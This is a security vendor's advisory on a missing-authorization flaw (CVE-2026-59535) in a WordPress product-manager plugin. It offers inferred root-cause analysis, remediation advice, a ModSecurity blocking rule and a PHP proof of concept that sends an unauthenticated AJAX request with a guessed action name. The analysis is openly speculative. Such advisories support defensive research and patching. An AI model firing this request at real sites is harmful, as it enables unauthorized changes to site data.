Published : August 12, 2026

CVE-2026-59535: Thrive Themes – Product Manager <= 10.9.2 Missing Authorization PoC, Patch Analysis & Rule

Severity Medium (CVSS 5.3)
CWE 862
Vulnerable Version 10.9.2
Patched Version
Disclosed July 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-59535 (metadata-based):

This vulnerability affects the Thrive Themes – Product Manager plugin for WordPress, versions up to and including 10.9.2. The CVE describes a missing authorization flaw that allows unauthenticated attackers to perform an unauthorized action. The CVSS vector (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) indicates a network-based attack with low complexity, requiring no privileges or user interaction, and resulting in a low integrity impact without affecting confidentiality or availability. The assigned CWE is CWE-862 (Missing Authorization). Since no source code diff is available, the exact vulnerable function and endpoint are not confirmed, but the CWE and description strongly suggest that a WordPress AJAX action or admin-post handler is registered without a capability check, allowing unauthenticated users to invoke it.

Root Cause:
Atomic Edge research infers that the vulnerability stems from an AJAX handler or admin-post callback missing a current_user_can() check or nonce verification. In WordPress, functions exposed via wp_ajax_* hooks are accessible to authenticated users, but if a handler is hooked to both wp_ajax_ and wp_ajax_nopriv_ (or if the capability check is omitted entirely), unauthenticated attackers can trigger it. The CWE-862 classification confirms that the affected function lacks the required authorization check, allowing unauthorized execution. This conclusion is inferred from the CVE description and the plugin’s likely use of common WordPress request handling patterns; no code confirmation is possible without the patched version.

Exploitation:
An attacker can exploit this vulnerability by sending a crafted HTTP request to the WordPress admin-ajax.php endpoint (or admin-post.php) with an action parameter that matches the plugin’s handler. Since the missing capability check permits unauthenticated access, the attacker does not need to provide a valid nonce or user session. The specific action name is not disclosed in the CVE metadata, but typical Thrive plugin actions follow a naming convention such as tpm_* or thrive_product_manager_*. A proof-of-concept request would include the action parameter and any required arguments that affect the plugin’s behavior, for example, changing product status or updating settings. The attack is performed entirely via HTTP, with no special prerequisites.

Remediation:
The vendor should patch this vulnerability by adding a capability check (e.g., current_user_can(‘manage_options’)) and verifying a valid nonce in the affected function. Developers should ensure that every ajax, admin-post, and REST endpoint includes proper authorization and nonce validation. The patched version 10.9.2.1 likely addresses this vulnerability. Site administrators should update the plugin to the latest version immediately and consider using a virtual patch (WAF rule) to block exploit attempts until patching is complete.

Impact:
Successful exploitation allows an unauthenticated attacker to perform an unauthorized action within the plugin’s functionality. The CVSS impact vector C:N/I:L/A:N indicates a low integrity impact, meaning the attacker could modify certain data or settings but cannot access sensitive information or disrupt availability. The exact consequence depends on the vulnerable function, but common scenarios include changing product configurations, modifying meta data, or triggering state changes. No direct privilege escalation or data breach is indicated by the CVE metadata, but the security boundary is violated.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-59535 (metadata-based)
# Blocks unauthenticated AJAX requests to likely vulnerable action if no nonce or capability parameters are present.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-59535 - Missing Authorization in Thrive Product Manager',severity:'CRITICAL',tag:'CVE-2026-59535'"
  SecRule ARGS_POST:action "@rx (^tpm_|^thrive_product_manager_)" "chain"
    SecRule REQUEST_COOKIES:wordpress_logged_in "@rx ^$" "t:none"
    SecRule ARGS_POST:nonce "@rx ^$" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-59535 - Thrive Themes – Product Manager <= 10.9.2 - Missing Authorization
// This PoC demonstrates an unauthenticated AJAX request to a likely vulnerable action.
// The exact action name is not disclosed; adjust the $action variable after identifying the handler.

$target_url = 'http://example.com/wp-admin/admin-ajax.php'; // WordPress AJAX endpoint
$action = 'tpm_update_product_status'; // Placeholder action name - verify actual hook

$ch = curl_init($target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => $action,
    'product_id' => 1,
    'status' => 0 // Example parameter; adjust based on real functionality
]));

$response = curl_exec($ch);
if ($response === false) {
    die('cURL error: ' . curl_error($ch));
}
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code === 200) {
    echo "[+] Unauthenticated action executed successfully.n";
    echo "Response: " . $response . "n";
} else {
    echo "[-] Request failed with HTTP code: $http_coden";
    echo "Response: " . $response . "n";
}

?>

Frequently Asked Questions

Atomic Edge WAF security layer inspecting website traffic.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Black & McDonald logo representing Enterprise tier security and support for Atomic Edge WAF.Covenant House Toronto logo featuring a dove and text for Atomic Edge Enterprise planAlzheimer Society Canada logo representing trusted organizations and security partners.University of Toronto logo representing trusted organizations using Atomic Edge WAFSpecsavvers logo, trusted developers and organizations using Atomic Edge securityHarvard Medical School logo representing trusted organizations using Atomic Edge WAF.